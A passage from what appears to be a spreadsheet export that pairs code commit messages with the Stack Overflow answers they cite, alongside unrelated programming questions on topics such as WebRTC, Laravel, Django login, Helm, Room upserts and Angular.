          if (isRecording) {
            requestAnimationFrame(drawFrame);
          }
        }
        // Start the recording loop when recording starts
        mediaRecorder.onstart = () =&amp;gt; {
          drawFrame();
        };
        console.log(&amp;quot;Recording setup complete&amp;quot;);
      } catch (err) {
        console.error(&amp;quot;Error setting up recording:&amp;quot;, err);
      }
    }
    async function toggleRecording() {
      const recordButton = document.getElementById('recordButton');
      if (!isRecording) {
        // Start recording
        recordedChunks = [];
        try {
          if (!mediaRecorder) {
            await setupRecording();
          }
          if (mediaRecorder &amp;amp;&amp;amp; mediaRecorder.state === 'inactive') {
            mediaRecorder.start(1000); // Record in 1-second chunks
            isRecording = true;
            recordButton.textContent = 'Stop Recording';
            recordButton.classList.add('recording');
            console.log(&amp;quot;Recording started&amp;quot;);
          }
        } catch (err) {
          console.error(&amp;quot;Error starting recording:&amp;quot;, err);
        }
      } else {
        // Stop recording
        if (mediaRecorder &amp;amp;&amp;amp; mediaRecorder.state === 'recording') {
          mediaRecorder.stop();
          isRecording = false;
          recordButton.textContent = 'Start Recording';
          recordButton.classList.remove('recording');
          console.log(&amp;quot;Recording stopped&amp;quot;);
        }
      }
    }
    function downloadRecording() {
      try {
        if (!recordedChunks.length) {
          console.error(&amp;quot;No recording data available&amp;quot;);
          return;
        }
        const blob = new Blob(recordedChunks, {
          type: 'video/webm'
        });
        const url = URL.createObjectURL(blob);
        const a = document.createElement('a');
        document.body.appendChild(a);
        a.style.display = 'none';
        a.href = url;
        a.download = `call-recording-${new Date().toISOString()}.webm`;
        a.click();
        // Cleanup
        window.URL.revokeObjectURL(url);
        document.body.removeChild(a);
        recordedChunks = [];
        document.getElementById('downloadButton').disabled = true;
      } catch (err) {
        console.error(&amp;quot;Error downloading recording:&amp;quot;, err);
      }
    }
    // Cleanup when the call ends
    window.onbeforeunload = () =&amp;gt; {
      if (localStream) {
        localStream.getTracks().forEach((track) =&amp;gt; track.stop());
      }
      if (peerConnection) {
        peerConnection.close();
      }
      if (signalingChannel) {
        signalingChannel.close();
      }
      if (mediaRecorder &amp;amp;&amp;amp; mediaRecorder.state === 'recording') {
        mediaRecorder.stop();
      }
      isRecording = false;
    };
    window.onunload = () =&amp;gt; {
  if (peerConnection) {
    peerConnection.close();
  }
};
  &amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any clues as to why there is an extra remote video? By the way, I am using the same webcam for both peer connections.&lt;/p&gt;
&lt;p&gt;So I would end up seeing 3 webcams. One for local. 2 for remote peers. There should only be 2 webcam streams. 1 for local. 1 for remote peer. This is because I only had two tabs open for the video call meeting room.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C638</t>
  </si>
  <si>
    <t>Remove getResults() calls from transformers
I might be wrong about this, but from what I understand, accessing
relationships via attributes is faster than calling its method. The
latter creates a new instance of the relation each time, and runs
the query again. The former reuses the existing relation, and if
the query has already been run, returns those results. I might be
wrong about that though. More info:
https://stackoverflow.com/questions/28223289</t>
  </si>
  <si>
    <t>Short answer
$model-&gt;relation()
returns the
relationship object
$model-&gt;relation
returns the
result
of the relationship
Long answer
$model-&gt;relation()
can be explained pretty simple. You're calling the actual function you defined your relation with. Yours for
distributor
probably looks somewhat like this:
public function distributors(){
    return $this-&gt;hasMany('Distributor');
}
So when calling
$store-&gt;distributors()
you just get the return value of
$this-&gt;hasMany('Distributor')
which is an instance of
Illuminate\Database\Eloquent\Relations\HasMany
When do you use it?
You usually would call the relationship function if you want to further specify the query before you run it. For example add a where statement:
$distributors = $store-&gt;distributors()-&gt;where('priority', '&gt;', 4)-&gt;get();
Of course you can also just do this:
$store-&gt;distributors()-&gt;get()
but that has the same result as
$store-&gt;distributors
.
Which brings me to the explanation of the
dynamic relationship property
.
Laravel does some things under the hood to allow you to directly access the results of a relationship as property. Like:
$model-&gt;relation
.
Here's what happens in
Illuminate\Database\Eloquent\Model
1)
The properties don't actually exist. So if you access
$store-&gt;distributors
the call will be proxied to
__get()
2)
This method then calls
getAttribute
with the property name
getAttribute('distributors')
public function __get($key)
{
    return $this-&gt;getAttribute($key);
}
3)
In
getAttribute
it checks if the relationship is already loaded (exists in
relations
). If not and if a relationship method exists it will load the relation (
getRelationshipFromMethod
)
public function getAttribute($key)
{
    // code omitted for brevity
    if (array_key_exists($key, $this-&gt;relations))
    {
        return $this-&gt;relations[$key];
    }
    $camelKey = camel_case($key);
    if (method_exists($this, $camelKey))
    {
        return $this-&gt;getRelationshipFromMethod($key, $camelKey);
    }
}
4)
In the end Laravel calls
getResults()
on the relation which then results in a
get()
on the query builder instance. (And that gives the same result as
$model-&gt;relation()-&gt;get()
.</t>
  </si>
  <si>
    <t xml:space="preserve">After spending many years of analysis, design and programming in different
domains and architectures, you have maybe come across a "pattern" or good 
practice that haven't been published as a pattern (analysis, design or architecture).
Although you have done it many times before, it has no name.
Interested in patterns from the SO-community.
</t>
  </si>
  <si>
    <t>C639</t>
  </si>
  <si>
    <t>Refactor passing method with arguments with lambda
Refactor the passing of an Object, its method and its arguments using a
lambda function instead of `std::bind`, which allows for the reuse of
the existing `capture_output` function without the need to overload it.
== References:
- [c\+\+ \- c\+\+0x: proper way to receive a lambda as parameter by
  reference \- Stack Overflow]
  (https://stackoverflow.com/questions/6458612/c0x-proper-way-to-receive-a-lambda-as-parameter-by-reference)</t>
  </si>
  <si>
    <t>You cannot have an
auto
parameter. You basically have two options:
Option #1: Use
std::function
as you have shown.
Option #2: Use a template parameter:
template&lt;typename F&gt;
void f(F &amp;&amp; lambda) { /* ... */}
Option #2 may, in some cases, be more efficient, as it can avoid a potential heap allocation for the embedded lambda function object, but is only possible if
f
can be placed in a header as a template function. It may also increase compile times and I-cache footprint, as can any template. Note that it may have no effect as well, as if the lambda function object is small enough it may be represented inline in the
std::function
object.
Don't forget to use
std::forward&lt;F&amp;&amp;&gt;(lambda)
when referring to
lambda
, as it is an r-value reference.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After few successful request and responses, client sends a junk data request on line.&lt;/p&gt;
&lt;p&gt;I am trying Modbus RTU communication between a x86 cpu having serial DB9 port and raspberry pi connected with TTL-232RG TTL to USB converter using RS485 communication protocol. My client code on x86 machine is written in c++ using libmodbus library and server code on raspberry pi is written in python which just responds back with same request frame by adding dummy data and actual computed CRC.&lt;/p&gt;
&lt;p&gt;Issue is initially I am able to send correct requests and get response correctly, but after few such transactions there is junk request sent from client side. The junk request is more than 50 bytes longer.&lt;/p&gt;
&lt;p&gt;I tried running the client code with the standard docklight software running on my my laptop, there also same issue is seen.&lt;/p&gt;
&lt;p&gt;Need to know why this issue could be happening?&lt;/p&gt;
&lt;p&gt;I am using following client code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;modbus.h&amp;gt;
#include &amp;lt;iostream&amp;gt;
#include &amp;lt;unistd.h&amp;gt;
#include &amp;lt;cstring&amp;gt;
int main() {                     
    while(true) {
        modbus_t* ctx = modbus_new_rtu(&amp;quot;/dev/ttyUSB0&amp;quot;, 19200, 'N', 8, 1);
        if (ctx == nullptr) {
        std::cerr &amp;lt;&amp;lt; &amp;quot;Unable to create modbus context&amp;quot; &amp;lt;&amp;lt; std::endl;
        return -1;
        }
        modbus_set_slave(ctx, 201);
        modbus_rtu_set_serial_mode(ctx, MODBUS_RTU_RS485);
        modbus_rtu_set_rts(ctx, 1);
        if (modbus_connect(ctx) == -1) {
        std::cerr &amp;lt;&amp;lt; &amp;quot;Connection failed: &amp;quot; &amp;lt;&amp;lt; modbus_strerror(errno) &amp;lt;&amp;lt; std::endl;
        modbus_free(ctx);
        return -1;
        }
        uint16_t tab_reg[32];
        bool flag = true;
        while(flag == true) {
                memset(tab_reg, 0, (32*2));
            int rc = modbus_read_input_registers(ctx, 1, 1, tab_reg);
            if (rc == -1) {
            std::cerr &amp;lt;&amp;lt; &amp;quot;Failed to read registers: &amp;quot; &amp;lt;&amp;lt; modbus_strerror(errno) &amp;lt;&amp;lt; std::endl;
            modbus_close(ctx);
            modbus_free(ctx);
            flag = false;
            }
            for (int i = 0; i &amp;lt; rc; i++) {
            std::cout &amp;lt;&amp;lt; &amp;quot;Register &amp;quot; &amp;lt;&amp;lt; i &amp;lt;&amp;lt; &amp;quot;: &amp;quot; &amp;lt;&amp;lt; tab_reg[i] &amp;lt;&amp;lt; std::endl;
            }
            modbus_flush(ctx);
        }
    }
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C64</t>
  </si>
  <si>
    <t>Added Registration and Log In.
Followed this like a monkey: http://stackoverflow.com/questions/16901970/django-register-and-login-explained-by-example</t>
  </si>
  <si>
    <t>THIS is a very good tutorial about login &amp; Co. It explains very well how to perform login by ourself ad override existing django login pages.
#UPDATE:
Here Overview for Registration and Login. For more details go to the link.
To Register:
Views and URLs
Go to the lower site folder (where the settings.py file  is) and open the views.py file. At the top make sure the following  imports are included. Add them if not:
from django.shortcuts import
 render_to_response from django.http import HttpResponseRedirect from
 django.contrib.auth.forms import UserCreationForm from
 django.core.context_processors import csrf
Below that add the  following functions (you can put them after the Login functions):
 def
 register(request):
     if request.method == 'POST':
         form = UserCreationForm(request.POST)
         if form.is_valid():
             form.save()
             return HttpResponseRedirect('/accounts/register/complete')
     else:
         form = UserCreationForm()
     token = {}
     token.update(csrf(request))
     token['form'] = form
     return render_to_response('registration/registration_form.html', token)
 def registration_complete(request):
     return render_to_response('registration/registration_complete.html')
Open the  urls.py file in the site folder (same folder as settings.py). Below  urlpatterns = patterns('', insert the following lines.
     # Registration URLs
     url(r'^accounts/register/$', 'simplesite.views.register', name='register'),
     url(r'^accounts/register/complete/$', 'simplesite.views.registration_complete',
 name='registration_complete'),
Templates  We will assume your site  already has a templates directory and a base.html file with the  navigation bar. Open the base.html file and in the nav element add a  navigation menu link to the login page
&lt;a href="/accounts/register"&gt;register&lt;/a&gt;
If one does not already exist,  go to the templates folder and create a folder inside it named  registration. Create a file called registration_form.html, save it to  the templates/registration folder, then populate it with the  following:
{% extends "base.html" %} {% block title %}Register{%
 endblock %} {% block content %}
   &lt;h2&gt;Registration&lt;/h2&gt;
   &lt;form action="/accounts/register/" method="post"&gt;{% csrf_token %}
     {{form.as_p}}   &lt;input type="submit" value="Register" /&gt;
   &lt;/form&gt;
 {% endblock %}
Create a file called registration_complete.html, save  it to the templates/registration folder, and populate it with the  following:
{% extends "base.html" %} {% block title %}You are
 Registered{% endblock %} {% block content %}
   &lt;h2&gt;Thank you for Registering&lt;/h2&gt;   &lt;p&gt;&lt;a
 href="/accounts/login/"&gt;Please Login&lt;/a&gt;&lt;/p&gt;
 {% endblock %}
To Login:
Views and URLs Open the views.py file in the lower site folder (where the settings.py file is). If there isn't one then create and save it. At the top of the file insert the following import: from django.shortcuts import render_to_response Below that you only need to add one function rendering the loggedin page. The other functions (login and logout) are in the views.py file in the Django Auth folder.
def loggedin(request):
    return render_to_response('registration/loggedin.html')
Optionally, if you want to show their username when they login then call their username in the view. Change the loggedin function to:
def loggedin(request):
    return render_to_response('registration/loggedin.html',
                              {'username': request.user.username})
Open the urls.py file in the site folder (same folder as settings.py). Below urlpatterns = patterns('', insert the following lines.
# Auth-related URLs:
url(r'^accounts/login/$', 'django.contrib.auth.views.login', name='login'),
url(r'^accounts/logout/$', 'django.contrib.auth.views.logout', name='logout'),
url(r'^accounts/loggedin/$', 'simplesite.views.loggedin', name='loggedin'),
With simplesite being the name of the folder that holds the views.py file that you are calling. Open the settings.py file and at the bottom insert LOGIN_REDIRECT_URL = '/accounts/loggedin/'. Django's default is to redirect to /accounts/profile when you log in, which is fine if you have an profile page at that url. If not you need to change your settings default for the Login redirect url to the one holding your loggedin.html page.
Templates
We will assume your site already has a templates directory and a base.html file with the navigation bar. Open the base.html file and in the nav element add a navigation menu link to the login page &lt;a href="/accounts/login"&gt;login&lt;/a&gt; Add a logout link too &lt;a href="/accounts/logout"&gt;logout&lt;/a&gt; Create a directory called registration inside the templates folder. If you do this through the command line, type mkdir registration Create a file called login.html, save it to the templates/registration folder, and populate it with the following:
{% extends "base.html" %}
{% block title %}Log In{% endblock %}
{% block content %}
&lt;form method="post" action="{% url 'django.contrib.auth.views.login' %}"&gt;
{% csrf_token %}
&lt;table&gt;
  {{ form.as_table }}
&lt;/table&gt;
&lt;input type="submit" value="login" /&gt;
&lt;/form&gt;
{% endblock %}
{{ form.as_table }} uses the Django Forms module to create the form. You can create an unformatted form by using {{ form }} without the HTML table tags, or have each field put inside paragraph tags with {{ form.as_p }}, or as an unordered list {{ form.as_ul }}. Optionally, you can also lay out your own form structure and use the form field tags as follows:
{% extends "base.html" %}
{% block title %}Log In{% endblock %}
{% block content %}
&lt;form method="post" action="{% url 'django.contrib.auth.views.login' %}"&gt;
{% csrf_token %}
{% if form.errors %}
&lt;p&gt;Your Username or Password were not entered correctly. Please try again.&lt;/p&gt;
{% endif %}
&lt;table&gt;
&lt;tr&gt;
    &lt;td&gt;{{ form.username.label_tag }}&lt;/td&gt;
    &lt;td&gt;{{ form.username }}&lt;/td&gt;
    &lt;td&gt;{{ form.username.errors }}&lt;/td&gt; 
&lt;/tr&gt;
&lt;tr&gt;
    &lt;td&gt;{{ form.password.label_tag }}&lt;/td&gt;
    &lt;td&gt;{{ form.password }}&lt;/td&gt;
    &lt;td&gt;{{ form.password.errors }}&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;input type="submit" value="login" /&gt;
&lt;/form&gt;
{% endblock %}
Create a file called loggedin.html, save it to the templates/registration folder, and populate it with the following:
{% extends "base.html" %}
{% block title %}Logged In{% endblock %}
{% block content %}
  &lt;h2&gt;You are logged in&lt;/h2&gt;
{% endblock %}
If you want to display the username, you would make the adjustment to the view discussed in the views section. Then change the loggedin.html template to the below (change the wording as you see fit):
{% extends "base.html" %}
{% block title %}Logged In{% endblock %}
{% block content %}
&lt;h1&gt;Welcome {{username}}&lt;/h1&gt;
&lt;p&gt;Thank you for logging in.&lt;/p&gt;
&lt;p&gt;&lt;a href="/accounts/logout/"&gt;Logout&lt;/a&gt;&lt;/p&gt;
{% endblock %}
Create a file called logged_out.html, save it to the templates/registration folder and populate it with the following:
{% extends "base.html" %}
{% block title %}Logged Out{% endblock %}
{% block content %}
  &lt;h2&gt;Logged out!&lt;/h2&gt;
  &lt;p&gt;&lt;a href="/accounts/login/"&gt;Log back in&lt;/a&gt;&lt;/p&gt;
{% endblock %}</t>
  </si>
  <si>
    <t xml:space="preserve">I'm obviously not talking about a full solution, but just a good starting point for common applications for software architects. It could be for a CMS, e-commerce storefront, address book, etc. A UML diagram is not essential, but a table schema with data types in the least. Thanks!
</t>
  </si>
  <si>
    <t>C640</t>
  </si>
  <si>
    <t>[elasticsearch] do not regenerate certs when they already exists (#1691)
This commit update the way we generate the Elasticsearch certs to lookup
if the certs secret already exists and reuse the secrets instead of regenerate
the certs.
This fix the issue when upgrading from a previous version of the chart
that doesn't include the certs secret by ensuring that the certs secret
is created if it doesn't exists.
This method also add more flexibility than charts hooks by ensuring that
the certs won't be rotated each time we upgrade the chart.
Found in https://stackoverflow.com/a/61715870</t>
  </si>
  <si>
    <t>From helm 3.1 version onwards, there is a lookup function available to check if the given resource exists or not. Using this function you can skip the upgrading or installing a resource if it already exists.
Lookup function
For example, see this
sample-chart
. I have created a function named
gen.secret
in _helpers.tpl and used it in secret.yaml</t>
  </si>
  <si>
    <t xml:space="preserve">I am reorganizing my ColdFusion directory structures and am curious about how experienced CF developers are organizing libraries of smaller cffunctions.
I am not as curious about elaborate components (objects) as I am about the dozens of little utility functions we all build up over time.
Do you use a large single file with cffunctions and cfinclude it? 
Do you use a large single file as a cfcomponent and call creatobject/cfinvoke?
Do you put each utility cffunction in its own cfc and call createobject/cfinvoke?
Do you use the cfimport taglib syntax?
Do you use the CustomTags or cfmodule?
Do you have a better way?
Since I don't like verbose syntax I have been just cfincluding a lib.cfm that has a bunch of common cffunctions in it. I may refactor them to grouped cfcs I can createobject on just to have better isolation on variable scopes.
Is there a better way to do this?
</t>
  </si>
  <si>
    <t>C641</t>
  </si>
  <si>
    <t>Added ApiCapabilities.needsLegacyHtml and ViewUtils.html because Html.fromHtml is deprecated on 24 and above.
Added UrlUtils to reuse CustomTabsIntent logic and buildUrl for appending paths.
Updated ChromeTabsHelperActivity to fallback to opening browser if a fallback is not passed in.
Fixes bug in HelpSettingsActivity that was falling back to wrong Privacy link.
Opening custom tab when clicking on links based on this answer: // https://stackoverflow.com/a/19989677</t>
  </si>
  <si>
    <t>Based upon
another answer
, here's a function setTextViewHTML() which parses the links out of a HTML string and makes them clickable, and then lets you respond to the URL.
protected void makeLinkClickable(SpannableStringBuilder strBuilder, final URLSpan span)
{
    int start = strBuilder.getSpanStart(span);
    int end = strBuilder.getSpanEnd(span);
    int flags = strBuilder.getSpanFlags(span);
    ClickableSpan clickable = new ClickableSpan() {
        public void onClick(View view) {
            // Do something with span.getURL() to handle the link click...
        }
    };
    strBuilder.setSpan(clickable, start, end, flags);
    strBuilder.removeSpan(span);
}
protected void setTextViewHTML(TextView text, String html)
{
    CharSequence sequence = Html.fromHtml(html);
    SpannableStringBuilder strBuilder = new SpannableStringBuilder(sequence);
    URLSpan[] urls = strBuilder.getSpans(0, sequence.length(), URLSpan.class);   
    for(URLSpan span : urls) {
        makeLinkClickable(strBuilder, span);
    }
    text.setText(strBuilder);
    text.setMovementMethod(LinkMovementMethod.getInstance());       
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to run dynamodb locally with tables created and data loaded upon initialization.&lt;/p&gt;
&lt;p&gt;I tried docker compose from AWS &lt;a href="https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/DynamoDBLocal.DownloadingAndRunning.html" rel="nofollow noreferrer"&gt;documentation&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;services:
 dynamodb-local:
   command: &amp;quot;-jar DynamoDBLocal.jar -sharedDb -dbPath ./data&amp;quot;
   image: &amp;quot;amazon/dynamodb-local:latest&amp;quot;
   container_name: dynamodb-local
   ports:
     - &amp;quot;8000:8000&amp;quot;
   volumes:
     - &amp;quot;./docker/dynamodb:/home/dynamodblocal/data&amp;quot;
   working_dir: /home/dynamodblocal
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and listing table using below&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;AWS_DEFAULT_REGION=region AWS_ACCESS_KEY_ID=id AWS_SECRET_ACCESS_KEY=key aws dynamodb list-tables --endpoint-url http://localhost:8000 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Although the dynamodb appears to be get initialized but upon listing(or even creating getting below error&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;WARNING: [sqlite] cannot open DB[12]: com.almworks.sqlite4java.SQLiteException: [14] unable to open database file
dynamodb-local    | Feb 20, 2025 2:57:17 AM com.almworks.sqlite4java.Internal log
dynamodb-local    | SEVERE: [sqlite] SQLiteQueue[shared-local-instance.db]: error running job queue
dynamodb-local    | com.almworks.sqlite4java.SQLiteException: [14] unable to open database file
dynamodb-local    |     at com.almworks.sqlite4java.SQLiteConnection.open0(SQLiteConnection.java:1480)
dynamodb-local    |     at com.almworks.sqlite4java.SQLiteConnection.open(SQLiteConnection.java:282)
dynamodb-local    |     at com.almworks.sqlite4java.SQLiteConnection.open(SQLiteConnection.java:293)
dynamodb-local    |     at com.almworks.sqlite4java.SQLiteQueue.openConnection(SQLiteQueue.java:464)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Appreciate any help in local set up (with possible script called during initialization to create table and load data).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C642</t>
  </si>
  <si>
    <t>🎨 Isolate CLI implementation to be testable
The current code couldn't be tested because of the basic implementation using cobra.
This commit refacts the implementation to isolate the interface struct so that
we can have a better reuse of the output of the commands. This is based on the
implementation of the Docker CLI structure described at the following:
https://stackoverflow.com/questions/59709345/how-to-implement-unit-tests-for-cli-commands-in-go/59714127#59714127</t>
  </si>
  <si>
    <t>There are multiple approaches to implementing a CLI using go. This is the basic structure of the CLI I developed which is mostly influenced by the docker CLI and I have added unit tests as well.
The first thing you need is to have CLI as an interface. This will be inside a package named "cli".
package cli
type Cli interface {
     // Have interface functions here
     sayHello() error
}
This will be implemented by 2 clis: HelloCli (Our real CLI) and MockCli (used for unit tests)
package cli
type HelloCli struct {
}
func NewHelloCli() *HelloCli {
    cli := &amp;HelloCli{
    }
    return cli
}
Here the HelloCli will implement sayHello function as follows.
package cli
func (cli *HelloCli) SayHello() error {
    // Implement here
}
Similarly, there will be a mock cli in a package named
test
that would implement cli interface and it will also implement the sayHello function.
package test
type MockCli struct {
    }
    func NewMockCli() *HelloCli {
        cli := &amp;MockCli{
        }
        return cli
    }
func (cli *MockCli) SayHello() error {
        // Mock implementation here
    }
Now I will show how the command is added. First I would have the main package and this is where I would add all the new commands.
package main
func newCliCommand(cli cli.Cli) *cobra.Command {
    cmd := &amp;cobra.Command{
        Use:   "foo &lt;command&gt;"
    }
    cmd.AddCommand(
        newHelloCommand(cli),
    )
    return cmd
}
func main() {
    helloCli := cli.NewHelloCli()
    cmd := newCliCommand(helloCli)
    if err := cmd.Execute(); err != nil {
        // Do something here if execution fails
    }
}
func newHelloCommand(cli cli.Cli) *cobra.Command {
    cmd := &amp;cobra.Command{
        Use:   "hello",
        Short: "Prints hello",
        Run: func(cmd *cobra.Command, args []string) {
            if err := pkg.RunHello(cli, args[0]); err != nil {
                // Do something if command fails
            }
        },
        Example: "  foo hello",
    }
    return cmd
}
Here, I have one command called
hello
. Next, I will have the implementation in a separate package called "pkg".
package pkg
func RunHello(cli cli.Cli) error {
    // Do something in this function
    cli.SayHello()
    return nil
}
The unit tests will also be contained in this package in a file named
hello_test
.
package pkg
func TestRunHello(t *testing.T) {
    mockCli := test.NewMockCli()
    tests := []struct {
        name     string
    }{
        {
            name:     "my test 1",
        },
        {
            name:     "my test 2"
        },
    }
    for _, tst := range tests {
        t.Run(tst.name, func(t *testing.T) {
            err := SayHello(mockCli)
            if err != nil {
                t.Errorf("error in SayHello, %v", err)
            }
        })
    }
}
When you execute
foo hello
, the
HelloCli
will be passed to the sayHello() function and when you run unit tests,
MockCli
will be passed.</t>
  </si>
  <si>
    <t xml:space="preserve">One of my favourite data structures in college was the [external-link]. It's a great data structure for holding a large set of strings if the prefixes are shared. Lookups are also nice, since they are done at O(|length|) of the string regardless of how many strings are in the set.
By comparison, a balanced tree would be O(log N) in the number of set items, plus whatever you pay for comparisons. A hash table would involve the hash calculation, comparison, etc.
It is therefore surprising to me that [external-link].
The only reason I could come up with was the possibility that memory access costs make it too expensive. Rather than investigating O(log N) locations if doing a tree lookup, you are not doing O(|length|) different locations, with all the consequences. If the strings are long, this could end up being way too much.
So I'm wondering: how much is what I just described a concern? What do you do when you need to store a large set or map of strings? 
</t>
  </si>
  <si>
    <t>C643</t>
  </si>
  <si>
    <t>refactor: Pure Modularization, StateFlow, Upsert(Fix), and Theming (check commit notes)
What changed?
1. Modularization is now Pure Modularization, with Single Activity Approach + Jetpack Navigation,
   and navigation between feature using Implicit DeepLink as recommended by Google here :
   https://developer.android.com/guide/navigation/integrations/multi-module
   Now Modularization in this app is not anti-pattern, not violating SSOT (Single Source of Truth) of the data or any architecture
   cautions.
2. Pure Reactive Programming. Ditched all LiveData, embrace the StateFlow for more better UI State observing.
   Also moved several DAOs to return as a non-one shot Flow emission (Favorite and Get Tourism By ID).
3. Upsert (Update and Insert) Fix with Partial Upsert Approach.
   Data from the API will be updated into the Local Data Cache of the app when user opened the app (if user has internet connection).
   If user's device not having any internet connection, it will emit the latest cached data from API (Offline-first app).
   Also with this Fix, Favorite feature in the app is working as expected.
4. More modular approach to theming by embedding all reusable Theming into :core:ui as a Base Theme.
   Each feature has it's own theme and implemented Base Theme. And also now app fully migrated to Material Design 3 by Google.
References :
https://developer.android.com/reference/kotlin/androidx/room/Upsert
https://stackoverflow.com/questions/48519896/room-update-or-insert-if-not-exist-rows-and-return-count-changed-rows</t>
  </si>
  <si>
    <t>As
@Danail Alexiev
said
@Insert
can return a
long
.
@Update
can return an
int
.
But for what purpose are you using update? If you just want the whole object to be replaced by the new one then just specify the
OnConflictStrategy
@Insert(onConflict = OnConflictStrategy.REPLACE)
void insert(Product products);
The result will be:
items that don't exist will be added, items that already exist will be replaced by the new ones.
In the case you need to
update just one param
(like quantity for example) you can do something like this
@Insert(onConflict = OnConflictStrategy.REPLACE)
  void insert(Product products);
  @Query("SELECT * from item WHERE id= :id")
  List&lt;Product&gt; getItemById(int id);
  @Query("UPDATE item SET quantity = quantity + 1 WHERE id = :id")
  void updateQuantity(int id)
  void insertOrUpdate(Product item) {
                List&lt;Product&gt; itemsFromDB = getItemById(item.getId())
                if (itemsFromDB.isEmpty())
                    insert(item)
                else
                    updateQuantity(item.getId())   
            }
        }
The result will be:
Try looking up the item in the DB, if found update a property, if not just insert a new item. So you only need to call one method
insertOrUpdate
from your DAO.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been learning Common Lisp for a short while, using the SBCL 2.0.0 REPL on a Windows 10 machine. At one point in time I inputted the 2 following lines into a REPL:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(defvar var-string (print (* 5 10)))
(read-from-string (write-to-string var-string))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which yielded the following output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;50
2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Trying the following, on the other hand:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(defvar foo-string (print (* 5 10 (* 5 5) )))
(read-from-string (write-to-string foo-string))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;yields this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1250
4
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In either case the first number outputted makes sense, but what is the reason for, and causal mechanism behind, the second number? Going by the above information, it seems to represent the complexity of the code being interpreted, but I am curious about how this is determined and why it is printed. I would also like to know how to repress its output, if possible, for prettier printing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C644</t>
  </si>
  <si>
    <t>Fix circular dependency issue while building lib in compilationMode: 
partial
https://stackoverflow.com/questions/71740550/circular-dependency-with-angular-13</t>
  </si>
  <si>
    <t>I was able to fix th issue by merging
tree-node.component.ts
,
tree-node-children.component.ts
and
tree-node-collection.component.ts
into a single file.
import {
  Component,
  ViewEncapsulation,
  Input,
  OnInit,
  OnDestroy
} from '@angular/core';
import {
  computed,
  action,
  reaction,
  observable
} from 'mobx';
import {
  TreeNode
} from '../../models/tree-node.model';
import {
  TreeVirtualScroll
} from '../../models/tree-virtual-scroll.model';
import {
  TreeModel
} from '../../models/tree.model';
@Component({
  selector: 'tree-node-collection',
  templateUrl: './tree-node-collection.component.html',
  encapsulation: ViewEncapsulation.None
})
export class TreeNodeCollectionComponent implements OnInit, OnDestroy {
  @Input()
  public get nodes() {
    return this._nodes;
  }
  public set nodes(nodes) {
    this.setNodes(nodes);
  }
  @Input() public treeModel: TreeModel;
  @observable public _nodes: any;
  private virtualScroll: TreeVirtualScroll; // Cannot inject this, because we might be inside treeNodeTemplateFull
  @Input() public templates: any;
  @observable public viewportNodes: TreeNode[];
  @computed public get marginTop(): string {
    const firstNode =
      this.viewportNodes &amp;&amp; this.viewportNodes.length &amp;&amp; this.viewportNodes[0];
    const relativePosition =
      firstNode &amp;&amp; firstNode.parent ?
      firstNode.position -
      firstNode.parent.position -
      firstNode.parent.getSelfHeight() :
      0;
    return `${relativePosition}px`;
  }
  public _dispose: any[] = [];
  @action public setNodes(nodes: any) {
    this._nodes = nodes;
  }
  public ngOnInit() {
    this.virtualScroll = this.treeModel.virtualScroll;
    this._dispose = [
      // return node indexes so we can compare structurally,
      reaction(
        () =&gt; this.virtualScroll
        .getViewportNodes(this.nodes)
        .map((n: {
          index: any
        }) =&gt; n.index),
        nodeIndexes =&gt; {
          this.viewportNodes = nodeIndexes.map((i: string | number) =&gt; this.nodes[i]);
        }, {
          compareStructural: true,
          fireImmediately: true
        }
        as any
      ),
      reaction(
        () =&gt; this.nodes,
        nodes =&gt; {
          this.viewportNodes = this.virtualScroll.getViewportNodes(nodes);
        }
      )
    ];
  }
  public ngOnDestroy() {
    this._dispose.forEach(d =&gt; d());
  }
  public trackNode(node: {
    id: any
  }) {
    return node.id;
  }
}
@Component({
  selector: 'tree-node-children',
  encapsulation: ViewEncapsulation.None,
  templateUrl: './tree-node-children.component.html'
})
export class TreeNodeChildrenComponent {
  @Input() public node: TreeNode;
  @Input() public templates: any;
}
@Component({
  selector: 'TreeNode, tree-node',
  templateUrl: './tree-node.component.html',
  encapsulation: ViewEncapsulation.None
})
export class TreeNodeComponent {
  @Input() public node: TreeNode;
  @Input() public index: number;
  @Input() public templates: any;
}</t>
  </si>
  <si>
    <t xml:space="preserve">Google Chrome and IE8 (among others) aim to provide greater reliability/stability by isolating each tab (web page) in a separate process (over-simplified, I know).
This would seem to be much more heavyweight then multiple threads, but has the major benefit of a crash in one process not bringing down the whole application.
It seems the multiple process architecture has long been used in server side applications (eg. web servers), but these are processes without a dedicated GUI.  It's interesting that it is now being employed in the user interfaces of desktop applications.
How would I go about implementing this in say a Windows Forms .NET application?  Is it even possible?  
Process.Start() is an obvious first place to look, but the GUI of the new process is not tightly integrated with the GUI of the host application.  It's a new standalone application, not a sub control/window of the host application, as it is with Chrome/IE8.
(For anyone interested Scott Hanselmann wrote a good intro. to the [external-link].)
[Update]
More specifically:
